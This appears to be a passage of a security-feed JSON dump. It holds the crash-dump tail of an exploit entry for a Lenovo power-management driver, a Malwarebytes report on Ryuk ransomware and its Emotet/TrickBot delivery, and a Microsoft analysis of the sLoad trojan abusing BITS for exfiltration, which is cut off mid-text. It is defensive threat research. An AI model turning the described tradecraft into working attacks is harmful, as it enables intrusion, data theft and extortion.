rcx,[rsp+100h]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x42ce:\r\nfffff804`1f276cae 440f20c0 mov rax,cr8\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000\r\nrip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x5060:\r\nfffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!IofCallDriver+0x59:\r\nfffff804`1f12dba9 4883c438 add rsp,38h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtQueryInformationFile+0x1071:\r\nfffff804`1f6abb11 448bf0 mov r14d,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\nrax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0\r\nrip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtClose+0xffc:\r\nfffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtDeviceIoControlFile+0x56:\r\nfffff804`1f64c356 4883c468 add rsp,68h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7925:\r\nfffff804`1f27a305 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\nrax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c\r\nrip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\n00007fff`33aaf844 ?? ???\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n\r\n# Mitigation\r\n\r\nUpdate to Lenovo Power Management driver version 1.67.17.48 or higher", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47771"}], "malwarebytes": [{"lastseen": "2019-12-12T23:25:46", "bulletinFamily": "blog", "description": "_Ryuk_. A name once unique to a fictional character in a popular Japanese comic book and cartoon series is now a name that appears in several rosters of the nastiest ransomware to ever grace the wild web. \n\nFor an incredibly young strain\u2014only 15 months old\u2014Ryuk ransomware gaining such notoriety is quite a feat to achieve. Unless the threat actors behind its campaigns call it quits, too\u2014[Remember GandCrab?](<https://blog.malwarebytes.com/threat-spotlight/2019/07/threat-spotlight-sodinokibi-ransomware-attempts-to-fill-gandcrab-void/>)\u2014or law enforcement collars them for good, we can only expect the threat of Ryuk to loom large over organizations.\n\nFirst discovered in mid-August 2018, Ryuk immediately turned heads after [disrupting operations of all Tribune Publishing newspapers](<https://blog.malwarebytes.com/cybercrime/malware/2019/01/ryuk-ransomware-attacks-businesses-over-the-holidays/>) over the Christmas holiday that year. What was initially thought of as a server outage soon became clear to those affected that it was actually a malware attack. It was quarantined eventually; however, Ryuk [re-infected and spread onto connected systems](<https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html>) in the network because the security patches failed to hold when tech teams brought the servers back.\n\n### Big game hunting with Ryuk ransomware\n\nBefore the holiday attack on Tribune Publishing, Ryuk had been seen targeting various enterprise organizations worldwide, asking ransom payments ranging from 15 to 50 Bitcoins (BTC). That translates to between US$97,000 and $320,000 at time of valuation.\n\nThis method of exclusively targeting large organizations with critical assets that almost always guarantees a high ROI for criminals is called \"big game hunting.\" It\u2019s not easy to pull off, as such targeted attacks also involve the customization of campaigns to best suit targets and, in turn, increase the likelihood of their effectiveness. This requires much more work than a simple \"spray-and-pray\" approach that can capture numerous targets but may not net such lucrative results.\n\nFor threat actors engaged in big game hunting, malicious campaigns are launched in phases. For example, they may start with a phishing attack to gather key credentials or drop malware within an organization's network to do extensive mapping, identifying crucial assets to target. Then they might deploy second and third phases of attacks for extended espionage, extortion, and eventual ransom.\n\nTo date, Ryuk ransomware is hailed as the costliest among its peers. According to a report by Coveware, a first-of-its-kind incident response company specializing in ransomware, [Ryuk\u2019s asking price is 10 times the average](<https://www.coveware.com/blog/2019/2/19/ryuk-ransomware-exploring-the-technical-and-human-connections>), yet they also claim that ransoms are highly negotiable. The varying ways adversaries work out ransom payments suggests that there may be more than one criminal group who have access to and are operating Ryuk ransomware. \n\n### The who behind Ryuk\n\nAccurately pinpointing the origin of an attack or malware strain is crucial, as it reveals as much about the threat actors behind attack campaigns as it does the payload itself. The name \u201cRyuk,\u201d which has obvious Japanese ties, is not a factor to consider when trying to discover who developed this ransomware. After all, it's common practice for cybercriminals to use handles based on favorite anime and manga characters. These days, a malware strain is more than its name.\n\nInstead, similarities in code base, structure, attack vectors, and languages can point to relations between criminal groups and their malware families. Security researchers from Check Point found [a connection between the Ryuk and Hermes ransomware strains](<https://research.checkpoint.com/2018/ryuk-ransomware-targeted-campaign-break/>) early on due to similarities in their code and structure, an association that persists up to this day. Because of this, many have assumed that Ryuk may also have ties with the [Lazarus Group](<https://blog.malwarebytes.com/threat-analysis/2019/03/the-advanced-persistent-threat-files-lazarus-group/>), the same North Korean [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) group that operated the Hermes ransomware in the past.\n\n* * *\n\n_Recommended read: _[_Hermes ransomware distributed to South Koreans via recent Flash zero-day_](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>)\n\n* * *\n\nHowever, code likeness alone is insufficient basis to support the Ryuk/North Korean ties narrative. Hermes is a ransomware kit that is frequently peddled on the underground market, making it available for other cybercriminals to use in their attack campaigns. Furthermore, separate research from cybersecurity experts at [CrowdStrike](<https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/>), [FireEye](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>), [Kryptos Logic](<https://www.kryptoslogic.com/blog/2019/01/north-korean-apt-and-recent-ryuk-ransomware-attacks/>), and [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/>) has indicated that the gang behind Ryuk may actually be of Russian origin\u2014and not necessarily nation-state sponsored.\n\nAs of this writing, the origins of Ryuk ransomware can be attributed (with high confidence, per some of our cybersecurity peers) to two criminal entities: [Wizard Spider](<https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/>) and [CryptoTech](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/>). \n\nThe former is the well-known Russian cybercriminal group and operator of [TrickBot](<https://blog.malwarebytes.com/detections/trojan-trickbot/>); the latter is a Russian-speaking organization found selling [Hermes 2.1](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/>) two months before [the $58.5 million cyber heist](<https://www.taiwannews.com.tw/en/news/3544541>) that victimized the Far Eastern International Bank (FEIB) in Taiwan. According to reports, this version of [Hermes was used as a decoy or \"pseudo-ransomware,\"](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>) a mere distraction from the real goal of the attack.\n\n#### Wizard Spider \n\nRecent findings have revealed that Wizard Spider upgraded Ryuk to include a Wake-on-LAN (WoL) utility and an ARP ping scanner in its arsenal. WoL is a network standard that allows computing devices connected to a network\u2014regardless of which operating system they run\u2014to be turned on remotely whenever they're turned off, in sleep mode, or hibernating. \n\nARP pinging, on the other hand, is a way of discovering endpoints in a [LAN](<https://blog.malwarebytes.com/glossary/local-area-network/>) network that are online. According to CrowdStrike, these new additions reveal Wizard Spider's attempts to reach and infect as many of their target's endpoints as they can, demonstrating a persistent focus and motivation to increasingly monetize their victims\u2019 encrypted data.\n\n#### CryptoTech\n\nTwo months ago, Gabriela Nicolao ([@rove4ever](<https://twitter.com/rove4ever>)) and Luciano Martins ([@clucianomartins](<https://twitter.com/clucianomartins>)), both researchers at Deloitte Argentina, attributed Ryuk ransomware to CryptoTech, a little-known cybercriminal group that was observed touting Hermes 2.1 in an underground forum back in August 2017. Hermes 2.1, the researchers say, is Ryuk ransomware.\n\nThe CryptoTech post about Hermes version 2.1 on the dark web in August 2017 (Courtesy of McAfee)\n\nIn a Virus Bulletin [conference paper](<https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-shinigamis-revenge-long-tail-ryuk-malware/>) and [presentation](<https://www.virusbulletin.com/conference/vb2019/abstracts/shinigamis-revenge-long-tail-ryuk-malware/>) entitled _Shinigami\u2019s revenge: the long tail of the Ryuk ransomware_, Nicolao and Martins presented evidence to this claim: In June 2018, a couple of months before Ryuk made its first public appearance, an underground forum poster expressed doubt on CryptoTech being the author of Hermes 2.1, the ransomware toolkit they were peddling almost a year ago that time. CryptoTech\u2019s response was interesting, which Nicolao and Martins captured and annotated in the screenshot below.\n\nCryptoTech: Yes, we developed Hermes from scratch.\n\nThe Deloitte researchers also noted that after Ryuk emerged, CryptoTech went quiet.\n\nCrowdStrike has estimated that from the time Ryuk was deployed until January of this year, their operators have netted a total of 705.80 BTC, which is equivalent to US$5 million as of press time.\n\n### Ryuk ransomware infection vectors\n\nThere was a time when Ryuk ransomware arrived on clean systems to wreak havoc. But new strains observed in the wild now belong to a multi-attack campaign that involves [Emotet](<https://blog.malwarebytes.com/detections/trojan-emotet/>) and [TrickBot](<https://blog.malwarebytes.com/detections/trojan-trickbot/>). As such, Ryuk variants arrive on systems pre-infected with other malware\u2014a \"triple threat\" attack methodology. \n\nHow the Emotet, TrickBot, and Ryuk triple threat attack works (Courtesy of Cybereason)\n\nThe first stage of the attack starts with a weaponized Microsoft Office document file\u2014meaning, it contains malicious macro code\u2014attached to a [phishing email](<https://blog.malwarebytes.com/101/2017/06/somethings-phishy-how-to-detect-phishing-attempts/>). Once the user opens it, the malicious macro will run `cmd` and execute a PowerShell command. This command attempts to download [Emotet](<https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/>).\n\nOnce Emotet executes, it retrieves and executes another malicious payload\u2014usually [TrickBot](<https://blog.malwarebytes.com/101/2018/11/trickbot-takes-top-business-threat/>)\u2014and collects information on affected systems. It initiates the download and execution of TrickBot by reaching out to and downloading from a pre-configured remote malicious host.\n\nOnce infected with TrickBot, the threat actors then check if the system is part of a sector they are targeting. If so, they download an additional payload and use the admin credentials stolen using TrickBot to perform lateral movement to reach the assets they wish to infect.\n\nThe threat actors then check for and establish a connection with the target\u2019s live servers via a [remote desktop protocol (RDP)](<https://blog.malwarebytes.com/glossary/remote-desktop-protocol-rdp/>). From there, they drop Ryuk.\n\n\n\nSystems infected with the Ryuk ransomware displays the following symptoms:\n\n**Presence of ransomware notes.** Ryuk drops the ransom note, _RyukReadMe.html _or_ RyukReadMe.txt_, in every folder where it has encrypted files.\n\nThe HTML file, as you can see from the screenshot above, contains two private email addresses that affected parties can use to contact the threat actors, either to find out how much they need to pay to get access back to their encrypted files or to start the negotiation process.\n\nOn the other hand, the TXT ransom note contains (1) explicit instructions laid out for affected parties to read and comply, (2) two private email addresses affected parties can contact, and (3) a Bitcoin wallet address. Although email addresses may vary, it was noted that they are all accounts served at Protonmail or Tutanota. It was also [noted](<https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/>) that a day after the unsealing of [the indictment of two ransomware operators](<https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public>), Ryuk operators removed the Bitcoin address from their ransom notes, stating that it will be given to those affected once they are contacted via email.\n\nThere are usually two versions of the text ransom note: a polite version, which past research claims is comparable to BitPaymer\u2019s due to certain similar phrasings; and a not-so-polite version.\n\nRyuk ransom notes. Left: polite version; Right: not-so-polite version\n\nBitPaymer ransom note: polite version (Courtesy of Coveware) \n\n\nBitPaymer ransom note: not-so-polite version (Courtesy of Symantec)\n\n**Encrypted files with the RYK string attached to extension names.** Ryuk uses a combination of symmetric (via the use of [AES](<https://searchsecurity.techtarget.com/definition/Advanced-Encryption-Standard>)) and asymmetric (via the use of [RSA](<https://searchsecurity.techtarget.com/definition/RSA>)) encryption to encode files. A private key, which only the threat actor can supply, is needed to properly decrypt files.\n\nEncrypted files will have the .ryk file extension appended to the file names. For example, an encrypted _sample.pdf_ and _sample.mp4_ files will have the _sample.pdf.ryk_ and _sample.mp4.ryk_ file names, respectively.\n\nThis scheme is effective, assuming that each Ryuk strain was tailor-made for their target organization.\n\nWhile Ryuk encrypts files on affected systems, it avoids files with the extension .exe, .dll, and .hrmlog (a file type associated with Hermes). Ryuk also avoids encrypting files in the following folders:\n\n * AhnLab \n * Chrome\n * Microsoft\n * Mozilla\n * Recycle.bin\n * Windows\n\n## Protect your system from Ryuk\n\nMalwarebytes continues to track Ryuk ransomware campaigns, protecting our business users with real-time anti-malware and anti-ransomware technology, as well as [signature-less detection](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>), which stops the attack earlier on in the chain. In addition, we protect against triple threat attacks aimed at delivering Ryuk as a final payload by blocking downloads of Emotet or TrickBot.\n\n\n\nWe recommend IT administrators take the following actions to secure and mitigate against Ryuk ransomware attacks:\n\n * Educate every employee in the organization, including executives, on how to correctly handle [suspicious emails](<https://blog.malwarebytes.com/101/2018/06/five-easy-ways-to-recognize-and-dispose-of-malicious-emails/>).\n * Limit the use of privilege accounts to only a select few in the organization.\n * Avoid using [RDPs](<https://blog.malwarebytes.com/security-world/business-security-world/2018/08/protect-rdp-access-ransomware-attacks/>) without properly terminating the session.\n * Implement the use of a [password manager](<https://blog.malwarebytes.com/awareness/2019/10/when-can-we-get-rid-of-passwords-for-good/>) and single sign-on services for company-related accounts. Do away with other insecure password management practices.\n * Deploy an authentication process that works for the company.\n * Disable unnecessary share folders, so that in the event of a Ryuk ransomware attack, the malware is prevented from moving laterally in the network.\n * Make sure that all software installed on endpoints and servers is up to date and [all vulnerabilities are patched](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>). Pay particular attention to patching CVE-2017-0144, a remote code-execution vulnerability. This will prevent TrickBot and other malware exploiting this weakness from spreading.\n * Apply attachment filtering to email messages.\n * Disable macros across the environment.\n\nFor a list of technologies and operations that have been found to be effective against Ryuk ransomware attacks, you can go [here](<https://blog.malwarebytes.com/cybercrime/malware/2019/01/ryuk-ransomware-attacks-businesses-over-the-holidays/>).\n\n## Indicators of Compromise (IOCs)\n\nTake note that professional cybercriminals sell Ryuk to other criminals on the black market as a toolkit for threat actors to build their own strain of the ransomware. As such, one shouldn\u2019t be surprised by the number of Ryuk variants that are wreaking havoc in the wild. Below is a list of file hashes that we have seen so far:\n\n * cb0c1248d3899358a375888bb4e8f3fe\n * d4a7c85f23438de8ebb5f8d6e04e55fc\n * 3895a370b0c69c7e23ebb5ca1598525d\n * 567407d941d99abeff20a1b836570d30\n * c0d6a263181a04e9039df3372afb8016 \n\nAs always\u2014stay safe, everyone! \n\nThe post [Threat spotlight: The curious case of Ryuk ransomware](<https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-12-12T22:33:53", "published": "2019-12-12T22:33:53", "id": "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "href": "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", "type": "malwarebytes", "title": "Threat spotlight: The curious case of Ryuk ransomware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2019-12-12T21:51:01", "bulletinFamily": "blog", "description": "Many of today\u2019s threats evolve to incorporate as many [living-off-the-land](<https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/>) techniques as possible into the attack chain. The PowerShell-based downloader Trojan known as sLoad, however, puts all its bets on BITS.\n\nBackground Intelligent Transfer Service (BITS) is a component of the Windows operating system that provides an ability to transfer files in an asynchronous and throttled fashion using idle bandwidth. Abusing BITS, which provides the ability to create self-contained jobs that can be prioritized and queued up and that can launch other programs, has become a prevalent attack technique. Recent sophisticated malware campaigns like [Astaroth](<https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/>) have found success in the use of BITS for downloading payloads or additional components, especially in systems where the firewall is not configured to block malicious traffic from BITS jobs.\n\nsLoad, detected by Windows Defender Antivirus as TrojanDownloader:PowerShell/sLoad, is used by adversaries for exfiltrating system information and delivering additional payloads in targeted attacks. It has been around for a few years and has not stopped evolving. What hasn\u2019t changed, though, is its use of BITS for all of its exfiltration activities, as well as command-and-control (C2) communications from handshake to downloading additional payloads.\n\nOnce sLoad has infiltrated a machine, it can allow attackers to do further, potentially more damaging actions. Using exfiltrated information, attackers can identify what security solutions are running and test payloads before they are sneaked into the compromised system or, worse, high-priced targets. sLoad uses scheduled tasks, which runs the malware every three minutes, opening the window of opportunity for further compromise\u2014hence raising the risk for the affected machine\u2014every time it runs. We have already seen the malware attempt to deliver several other, potentially more dangerous Trojans to compromised machines.\n\nWhile several malware campaigns have leveraged BITS, sLoad\u2019s almost exclusive use of the service is notable. sLoad uses BITS as an alternative protocol to perform data exfiltration and most of its other malicious activities, enabling the malware to evade defenders and protections that may not be inspecting this unconventional protocol. Cloud-based machine learning-driven [behavioral blocking and containment](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>) capabilities in [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) detect and block sLoad\u2019s activities as Behavior:Win32/sLoad.A.\n\n\n\nIn this blog we\u2019ll share our analysis of the multiple ways in which sLoad is abusing BITS and share how Microsoft Defender Advanced Threat Protection defeats these advanced malware techniques.\n\n## Stealthy installation via multiple cascaded scripts\n\nsLoad is known to infect machines using spear-phishing emails and a common but effective detection evasion technique: the cascaded scripts. One script drops or downloads one or more scripts, passes control to one of these scripts, and repeats the process multiple times until the final component is installed.\n\nOver time, we\u2019ve seen some variations of this technique. One sLoad campaign used the link target field of a LNK file to run PowerShell commands that extracts and runs the first-stage PowerShell code, which is appended to the end of the LNK file or, in one instance, the end of the ZIP file that originally contained the LNK file. In another campaign, the first-stage PowerShell code itself uses a download BITS job to download either the sLoad script and the C2 URL file or the sLoad dropper PowerShell script that embeds the encrypted sLoad script and C2 URL file within itself.\n\nIn the most recent attacks, for the first stage, sLoad shifted from using PowerShell script to VBScript. The randomly named VBScript file is simply a proxy that builds and then drops and runs a PowerShell script, always named _rr.ps1_. This is none other than the same sLoad PowerShell dropper mentioned earlier that embeds the encrypted sLoad script and C2 URL file within itself.\n\nIn most variations of the installation, the sLoad dropper script is the last intermediate stage that performs the following actions, and eventually decrypts and runs the final sLoad script:\n\n 1. Creates an installation folder in the _%APPDATA%_ folder named after the first 6 characters of the Win32 Product UUID. \n 2. Drops an infection marker file named_ _in_, and during the successive executions, uses the _LastWriteTime_ on this file to check whether the malware is installed within last 30 mins, in which case, it terminates. \n 3. Drops the encrypted sLoad script and the C2 URL file as _config.ini_ and _web.ini_, respectively. \n 4. Builds and drops two more randomly named scripts: one VBScript and one PowerShell script. \n 5. Uses _schtasks.exe_ to create a scheduled task named _AppRunLog_ to run the randomly named VBScript from the previous step with decryption key supplied as a command line parameter; deletes the previously created related tasks (if found) before creating this one. The scheduled task is configured to start at 7:00 AM and run every 3 mins. \n\nThe dropped VBScript that runs under the scheduled task is yet another proxy that simply runs the dropped PowerShell script with the same command line parameter (the decryption key). The PowerShell script decrypts the contents of the previously dropped _config.ini_ in the memory into another piece of PowerShell code, which it then runs. This is the final component, the script detected as TrojanDownloader:PowerShell/sLoad, that uses BITS to perform every important malicious activity.\n\n## BITS abuse\n\nThe sLoad PowerShell script (the final component) then abuses BITS to carry out all of the following activities:\n\n### Finding an active C2 server\n\nThe malware decrypts the contents of previously dropped _web.ini_ into a set of 2 URLs and creates a BITS download jobs to test the connection to these URLs. It then saves the URL that responds in the form of a file that contains a message \u201csok\u201d, being downloaded as part of created BITS job. This ensures that the handshake is complete.\n\nIf none responds, the script appends the number \u201c1\u201d to the domain names in both URLs, saves the encrypted data back to the _web.ini_ file, and exits from the script. As a result, the next time the scheduled job runs, the script uses the modified _web.ini_ to obtain the modified URLs to attempt connecting to an active C2. With each unsuccessful attempt of connecting with C2s, the number appended to the domain names is increased by increments of 1 until it reaches 50, at which time it resets to 1. This technique offers a bit of a cushion and ensures continued contact between a compromised machine and a C2, in case the primary C2 is blocked.\n\nThis prevents the malware infrastructure from losing a compromised host if the primary C2 is blocked. It\u2019s also interesting to see how the URLs used to reach C2 are structured to appear related to CAPTCHA verification, an attempt to escape watchful eyes.\n\n\n\n### Fetching a new list of C2s\n\nFor continued exfiltration of information, it\u2019s important to maintain contact with an active C2. As the malicious domains cannot stay up running for a long time, the malware packs a functionality to refresh the list of C2 every time the scheduled task runs. Using a BITS download job, the malware downloads a new copy of web.ini from the active C2 to provisions a new set of C2s for future use.\n\n\n\n### Exfiltrating system information\n\nOnce an active C2 is identified, the malware starts collecting system information by performing the following:\n\n * saves the output of \u201cnet view\u201d command\n * enumerates network drives and saves the provider names and device ids\n * produces the list of all running processes\n * obtains the OS caption\n * looks for Outlook folder, as well as Independent Computing Architecture (ICA) files, which are used by Citrix application servers to store configuration information\n\nIt then creates a BITS download job with the _RemoteURL_ built using the URL for active C2 and the system information collected up this point.\n\nCrafting URLs infused with stolen info is not a novel attacker technique. In addition, creating a BITS job with an extremely large _RemoteURL_ parameter that includes non-encrypted system information stands out and is relatively easy to detect. However, this malware\u2019s use of a download job instead of an upload job is a clever move to achieve stealth.\n\n\n\n\n\n\n\n\n\n\n\n### Deploying additional payloads\n\nBecause the malware exfiltrates system information using a BITS download job, it gets an opportunity to receive a response in the form of a file downloaded to the machine. It uses this opportunity to obtain additional payloads from the C2.\n\nIt sleeps and waits for the file to be downloaded. If the downloaded file instructs to download and invoke additional PowerShell codes, the supplied URL is used for the task. If not, then the URL is assumed to be pointing to an encoded PE image payload. The malware creates another BITS download job to download this payload, creates a copy of this newly downloaded encoded file, and uses another Windows utility, _certutil.exe_, to decode it into a portable executable (PE) file with .exe extension. Finally, it uses _PowerShell.exe_ to run the decoded PE payload. One more BITS download job is created to download additional files.\n\n\n\n### Spying\n\nThe malware comes built with one of the most notorious spyware features: uploading 